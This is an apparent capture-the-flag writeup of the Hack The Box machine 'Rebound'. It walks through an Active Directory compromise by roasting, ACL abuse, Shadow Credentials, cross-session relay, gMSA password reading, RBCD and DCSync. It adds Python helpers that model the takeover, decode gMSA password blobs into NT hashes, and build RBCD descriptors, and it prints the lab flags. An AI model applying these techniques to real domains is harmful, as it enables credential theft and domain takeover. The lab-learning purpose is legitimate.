Rebound is an Insane Windows machine featuring a tricky Active Directory environment. User enumeration via RID cycling reveals an AS-REP-roastable user, whose TGT is used to Kerberoast another user with a crackable password. Weak ACLs are abused to obtain access to a group with FullControl over an OU, performing a Descendant Object Takeover (DOT), followed by a ShadowCredentials attack on a user with winrm access. On the target system, cross-session relay is leveraged to obtain the NetNTLMv2 hash of a logged-in user, which, once cracked, leads to a gMSA password read. Finally, the gMSA account allows delegation, but without protocol transition. Resource-Based Constrained Delegation (RBCD) is used to impersonate the Domain Controller, enabling a DCSync attack, leading to fully elevated privileges.
IP Address: 10.10.11.231
Nmap Scan
Summary
Before I start, I prefer to update the /etc/hosts file to prevent further issues and to communicate with the box without typing the IP each time.
Service Enumeration
DNS Enumeration
It's always good to try a zone transfer, but it hardly ever succeeds.
RPC & SMB Enumeration
I didn't get anything interesting from RPC, so SMB is next.
I can see that I have Read access on the Shared share, but unfortunately it's empty.
RID brute-forcing failed with an anonymous login but succeeded with the guest account.
I added the users I found to a wordlist to use it later
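Turning the RID-cycling output into a clean username list is worth doing with a small script rather than by hand, because group and machine-account entries mixed into the list only produce noise in the Kerberos attacks that follow. The block below is an added example, not part of the original writeup: the sample lines are constructed (not captured output) in the shape netexec/crackmapexec `--rid-brute` prints them, and the domain name and RIDs in the sample are placeholders.

```python
import re

# Assumed line shape for a resolved RID as printed by netexec/crackmapexec --rid-brute;
# only the trailing "RID: DOMAIN\name (SidType...)" part is matched, the leading columns vary.
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<sidtype>SidType\w+)\)\s*$"
)

# Constructed sample output (not captured from the target); names and RIDs are placeholders.
SAMPLE_OUTPUT = """\
SMB         10.10.11.231    445    DC01             [+] Brute forcing RIDs
SMB         10.10.11.231    445    DC01             500: rebound\\Administrator (SidTypeUser)
SMB         10.10.11.231    445    DC01             501: rebound\\Guest (SidTypeUser)
SMB         10.10.11.231    445    DC01             502: rebound\\krbtgt (SidTypeUser)
SMB         10.10.11.231    445    DC01             512: rebound\\Domain Admins (SidTypeGroup)
SMB         10.10.11.231    445    DC01             1000: rebound\\DC01$ (SidTypeUser)
SMB         10.10.11.231    445    DC01             1104: rebound\\oorend (SidTypeUser)
SMB         10.10.11.231    445    DC01             1107: rebound\\ServiceMgmt (SidTypeGroup)
SMB         10.10.11.231    445    DC01             1108: rebound\\winrm_svc (SidTypeUser)
SMB         10.10.11.231    445    DC01             1109: rebound\\delegator$ (SidTypeUser)
"""


def parse_rid_brute(output: str) -> list[dict]:
    """One record per resolved RID: rid (int), domain, name, sidtype."""
    records = []
    for line in output.splitlines():
        m = RID_LINE.search(line)
        if m:
            rec = m.groupdict()
            rec["rid"] = int(rec["rid"])
            records.append(rec)
    return records


def user_wordlist(records: list[dict], include_machines: bool = False) -> list[str]:
    """Usernames for Kerberos user enumeration / AS-REP roasting: SidTypeUser entries only,
    machine accounts (trailing $) dropped unless asked for, deduplicated and sorted."""
    names = {
        r["name"]
        for r in records
        if r["sidtype"] == "SidTypeUser" and (include_machines or not r["name"].endswith("$"))
    }
    return sorted(names, key=str.lower)


def group_names(records: list[dict]) -> list[str]:
    """Groups seen during cycling; useful later when looking at ACLs (e.g. ServiceMgmt)."""
    return [r["name"] for r in records if r["sidtype"] == "SidTypeGroup"]


def highest_rid(records: list[dict]) -> int:
    """If this is close to the tool's RID ceiling, rerun with a larger range."""
    return max((r["rid"] for r in records), default=0)


if __name__ == "__main__":
    recs = parse_rid_brute(SAMPLE_OUTPUT)
    with open("users.txt", "w") as fh:
        fh.write("\n".join(user_wordlist(recs)) + "\n")
    print("users:", user_wordlist(recs))
    print("groups:", group_names(recs), "highest RID:", highest_rid(recs))
```

Run it against the saved tool output instead of `SAMPLE_OUTPUT` to get `users.txt`; keep the machine accounts in a separate list, since they are not useful for AS-REP roasting but are for later delegation checks.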
LDAP & Kerberos Enumeration
I tried to query ldap anonymously but got nothing from it.
The last option now is Kerberos. With my username list, I can try two possible attacks: one common and one new to many people.
ASREP-Roasting Attack
Kerberoasting via an AS-REP-roastable account
Unluckily, cracking the hash failed, which made me move to the next possible attack.
To perform this attack, we need the latest version of Impacket.
This is the option we need: the -no-preauth flag of GetUserSPNs.py, which Kerberoasts through an AS-REQ on behalf of an account that does not require pre-authentication, so no password for that account is needed.
I will try to get some hashes and, if I succeed, output them to a file.
Let's check the validity of these credentials. Authentication to SMB worked but LDAP failed.
It looks like Kerberos authentication is enforced for LDAP, so I will try again with -k.
I faced a Kerberos clock skew problem and the common solutions didn't work, so I wrote this loop to sync the clock with the DC every second. "Not the best way, but it worked :)"
while true; do ntpdate 10.10.11.231; sleep 1; done
With valid domain credentials, I can move on to domain enumeration: credentialed enumeration against LDAP and SMB, and a password spray. I will start with bloodhound.py.
I found that two users shared the same password, and the third match was a group, not a user.
Looking at the permissions on the shares and the files inside them with the spider_plus module turned up nothing interesting. I will enumerate the domain manually with PowerView.py.
User oorend has AddSelf on the ServiceMgmt group, so I was curious to see the ACLs of that group, and I found that it has FullControl over the Service Users organisational unit (OU).
When enumerating the objects under this OU, I found that it contains the winrm_svc account, which is a member of Remote Management Users, so it can access the machine via WinRM.
The exploitation path is: abuse AddSelf => abuse FullControl on the OU with inheritance (Descendant Object Takeover) => ChangePassword on winrm_svc or Shadow Credentials => access the machine.
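The step that usually trips people up in this path is the middle one: FullControl on an OU does not by itself give control over the accounts inside it unless the ACE is inheritable, so the group's right has to be turned into an inheritable ACE on the OU (the "Descendant Object Takeover"). The model below is an added example, not the writeup's own tooling or a real directory: it reproduces the AddSelf => FullControl-with-inheritance => GenericAll-on-winrm_svc chain on a constructed object tree with placeholder DNs, ignoring NO_PROPAGATE and object-type-specific ACEs.

```python
from __future__ import annotations
from dataclasses import dataclass, field

# ACE inheritance flags as carried in a Windows ACE header (MS-DTYP 2.4.4.1).
OBJECT_INHERIT_ACE = 0x01
CONTAINER_INHERIT_ACE = 0x02
INHERIT_ONLY_ACE = 0x08


@dataclass
class Ace:
    trustee: str      # user or group the right is granted to
    right: str        # "AddSelf", "WriteDacl", "GenericAll", ...
    flags: int = 0    # no flags = applies to this object only, nothing below it


@dataclass
class AdObject:
    kind: str                 # "ou", "group" or "user"
    parent: str | None        # DN of the containing OU, None if not modelled
    dacl: list = field(default_factory=list)


def effective_rights(directory: dict, groups_of: dict, principal: str, target: str) -> set[str]:
    """Rights `principal` holds on `target`, directly or via group membership: explicit ACEs
    on the object plus inheritable ACEs on the OUs above it (simplified inheritance model)."""
    who = {principal} | groups_of.get(principal, set())
    obj = directory[target]
    rights = {a.right for a in obj.dacl if a.trustee in who and not a.flags & INHERIT_ONLY_ACE}
    wanted = CONTAINER_INHERIT_ACE if obj.kind == "ou" else OBJECT_INHERIT_ACE
    parent = obj.parent
    while parent is not None:
        rights |= {a.right for a in directory[parent].dacl if a.trustee in who and a.flags & wanted}
        parent = directory[parent].parent
    return rights


def add_self_to_group(directory: dict, groups_of: dict, user: str, group: str) -> None:
    """Step 1: AddSelf lets the user add itself as a member of the group."""
    if "AddSelf" not in effective_rights(directory, groups_of, user, group):
        raise PermissionError(f"{user} has no AddSelf on {group}")
    groups_of.setdefault(user, set()).add(group)


def descendant_object_takeover(directory: dict, groups_of: dict, principal: str, ou: str) -> None:
    """Step 2: with GenericAll/WriteDacl on the OU, write an inheritable GenericAll ACE so the
    right propagates to every object (users included) under the OU."""
    if not effective_rights(directory, groups_of, principal, ou) & {"GenericAll", "WriteDacl"}:
        raise PermissionError(f"{principal} cannot modify the DACL of {ou}")
    directory[ou].dacl.append(
        Ace(principal, "GenericAll", CONTAINER_INHERIT_ACE | OBJECT_INHERIT_ACE)
    )


OU_DN = "OU=Service Users,DC=example,DC=local"   # placeholder DN, not the real one


def build_lab() -> tuple[dict, dict]:
    """Constructed directory modelled on the page's path: ServiceMgmt has a non-inheritable
    FullControl (GenericAll) ACE on the OU; oorend has AddSelf on ServiceMgmt."""
    directory = {
        OU_DN: AdObject("ou", None, [Ace("ServiceMgmt", "GenericAll")]),
        "ServiceMgmt": AdObject("group", None, [Ace("oorend", "AddSelf")]),
        "winrm_svc": AdObject("user", OU_DN),
    }
    return directory, {}   # groups_of starts empty: oorend is in no relevant group yet


def run_chain() -> tuple[set[str], set[str], set[str]]:
    d, groups_of = build_lab()
    before = effective_rights(d, groups_of, "oorend", "winrm_svc")
    add_self_to_group(d, groups_of, "oorend", "ServiceMgmt")
    after_addself = effective_rights(d, groups_of, "oorend", "winrm_svc")
    descendant_object_takeover(d, groups_of, "oorend", OU_DN)
    after_dot = effective_rights(d, groups_of, "oorend", "winrm_svc")
    return before, after_addself, after_dot


if __name__ == "__main__":
    print(run_chain())
```

The middle result is the point: after AddSelf, oorend has GenericAll on the OU but still nothing on winrm_svc, and only the inheritable ACE written by the takeover step yields GenericAll on the account, which is what makes the password reset or the Shadow Credentials write possible.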
User Flag: 46bad1cb1f3b5f3da2945c6f38c92c7c
The password and ACLs are reset periodically, so I must hurry and establish a persistent shell.
After getting a shell in Metasploit, I wanted to query logged-on users, but it didn't give me anything. However, when filtering for logon type 9 (NewCredentials, the runas /netonly style of logon; a network logon is type 3), it shows that the tbrady user is logged on.
Looking into BloodHound for the privileges of that user, I found that it can read the gMSA account's password hash (ReadGMSAPassword).
To get this account, I can use a cross-session relay attack, steal its NetNTLMv2 hash, and try to crack it.
Following this repo instruction, I get these two commands.
Trying to crack the hash using hashcat succeeded :))
Now, I can read the gMSA hash.
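What "reading the gMSA hash" actually means: the DC returns the msDS-ManagedPassword attribute as an MSDS-MANAGEDPASSWORD_BLOB, the current password is a raw UTF-16LE byte string inside it, and the NT hash is MD4 over those bytes, which is what the tools then hand to Kerberos or NTLM authentication. The block below is an added example, not the tooling used in the writeup: it decodes a blob and derives the NT hash, with a constructed blob (short placeholder passwords instead of the long random ones a real gMSA carries) for testing. MD4 is implemented inline because hashlib's md4 is frequently disabled under OpenSSL 3.

```python
from __future__ import annotations
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = list(state)
        for fn, order, shifts, k in rounds:
            for i, j in enumerate(order):
                r[0] = _rotl((r[0] + fn(r[1], r[2], r[3]) + x[j] + k) & MASK, shifts[i % 4])
                r = [r[3], r[0], r[1], r[2]]   # rotate registers: ABCD -> DABC -> CDAB -> BCDA
        state = [(s + v) & MASK for s, v in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash = MD4 over the UTF-16LE password bytes (no terminator)."""
    return md4(password_utf16le).hex()


def parse_managed_password_blob(blob: bytes) -> dict:
    """Decode MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19): 16-byte header with offsets, then
    NUL-terminated UTF-16LE current/previous passwords and two 64-bit intervals (100 ns units)."""
    version, _reserved, length, cur_off, prev_off, qpi_off, upi_off = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")

    def utf16z(off: int) -> bytes:   # scan in 16-bit steps; a byte-wise search could split a code unit
        end = off
        while end + 2 <= len(blob) and blob[end:end + 2] != b"\x00\x00":
            end += 2
        return blob[off:end]

    current = utf16z(cur_off)
    previous = utf16z(prev_off) if prev_off else b""
    (query_interval,) = struct.unpack_from("<Q", blob, qpi_off)
    (unchanged_interval,) = struct.unpack_from("<Q", blob, upi_off)
    return {
        "current_password": current,                 # raw bytes: real gMSA passwords are not printable
        "current_nt_hash": nt_hash(current),
        "previous_password": previous,
        "previous_nt_hash": nt_hash(previous) if previous else None,
        "query_interval_s": query_interval / 10_000_000,
        "unchanged_interval_s": unchanged_interval / 10_000_000,
    }


def build_managed_password_blob(current: str, previous: str | None = None,
                                query_interval_s: int = 3600, unchanged_interval_s: int = 600) -> bytes:
    """Constructed blob for exercising the parser (placeholder passwords, not a real DC value)."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = (previous.encode("utf-16-le") + b"\x00\x00") if previous else b""
    body = cur + prev
    body += b"\x00" * ((-len(body)) % 8)   # alignment padding before the 64-bit intervals
    cur_off = 16
    prev_off = cur_off + len(cur) if previous else 0
    qpi_off = 16 + len(body)
    upi_off = qpi_off + 8
    header = struct.pack("<HHIHHHH", 1, 0, upi_off + 8, cur_off, prev_off, qpi_off, upi_off)
    return header + body + struct.pack("<QQ", query_interval_s * 10_000_000, unchanged_interval_s * 10_000_000)


if __name__ == "__main__":
    info = parse_managed_password_blob(build_managed_password_blob("Secret1!", "OldSecret"))
    print(info["current_nt_hash"], info["previous_nt_hash"], info["query_interval_s"])
```

Two things worth noticing when you look at a real blob: the previous password is often present too (handy if a service is still running with it), and the intervals tell you how long the hash you just read stays valid.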
I want to enumerate the delegation configured on the delegator$ account.
From here, I stopped and couldn't go any further. The constrained delegation here is for the http service, and I couldn't request a ticket impersonating the administrator or DC01, so the following attack path is very complicated and I will try to simplify it as much as I can.
Since I already have control of the delegator$ account, I can perform RBCD and add ldap_monitor to its msDS-AllowedToActOnBehalfOfOtherIdentity attribute, so ldap_monitor can impersonate any user in the domain towards delegator$.
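msDS-AllowedToActOnBehalfOfOtherIdentity is not a list of names: it is a binary, self-relative security descriptor whose DACL carries one ACCESS_ALLOWED ACE per account that may delegate to the target. The block below is an added example, not the writeup's tooling: it builds that value, parses an existing one back into SIDs, and appends a SID instead of overwriting the attribute (clobbering it would silently remove anyone already allowed to delegate, which is both destructive and easy to notice). Writing the value over LDAP is left to the usual tools; the SIDs and the 0x000F01FF access mask (the one impacket's rbcd.py uses) are assumptions of the example.

```python
from __future__ import annotations
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00
RBCD_ACE_MASK = 0x000F01FF            # mask written by common RBCD tooling (assumed here)
ADMINISTRATORS_SID = "S-1-5-32-544"   # owner/group of the constructed descriptor


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...-1109' -> binary SID (MS-DTYP 2.4.2.2)."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError(f"bad SID: {sid}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data: bytes, off: int = 0) -> str:
    revision, count = struct.unpack_from("<BB", data, off)
    authority = int.from_bytes(data[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def build_rbcd_descriptor(allowed_sids: list[str]) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR (20-byte header, owner, group, DACL) granting each SID."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header: type, flags, size; then access mask; then the SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), RBCD_ACE_MASK) + sid_b
    # ACL header: revision, sbz1, size, ace count, sbz2
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(ADMINISTRATORS_SID)
    off_owner = 20
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         off_owner, off_group, 0, off_dacl)   # no SACL
    return header + owner + owner + acl


def allowed_to_act_sids(sd: bytes) -> list[str]:
    """SIDs already granted in the DACL of an existing attribute value."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(sd, pos + 8))
        pos += ace_size
    return sids


def add_allowed_to_act(existing_sd: bytes | None, new_sid: str) -> bytes:
    """Append `new_sid` to the current value (or start a fresh one if the attribute is empty)."""
    current = allowed_to_act_sids(existing_sd) if existing_sd else []
    if new_sid not in current:
        current.append(new_sid)
    return build_rbcd_descriptor(current)


if __name__ == "__main__":
    # Placeholder SID standing in for ldap_monitor; the real one comes from LDAP (objectSid).
    monitor_sid = "S-1-5-21-1111111111-2222222222-3333333333-1109"
    print(allowed_to_act_sids(add_allowed_to_act(None, monitor_sid)))
```

Before writing, read the attribute and keep a copy of the original bytes so it can be restored; the value you push is the raw descriptor, and the DC will reject it if the SID is malformed or the DACL size fields are off.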
Requesting a service ticket for delegator$ as ldap_monitor, impersonating DC01$, so the resulting ticket carries the forwardable flag.
Using this forwardable ticket as the additional ticket in delegator$'s S4U2Proxy request, in place of the S4U2Self ticket (which is not forwardable when the account has no protocol transition), to impersonate the DC to the http service.
Dumping the ntds.dit secrets
Access the machine as an administrator
Root Flag: 56bf9cc0fa746883f65ab822f3ceb779
I used this repo to perform the attack: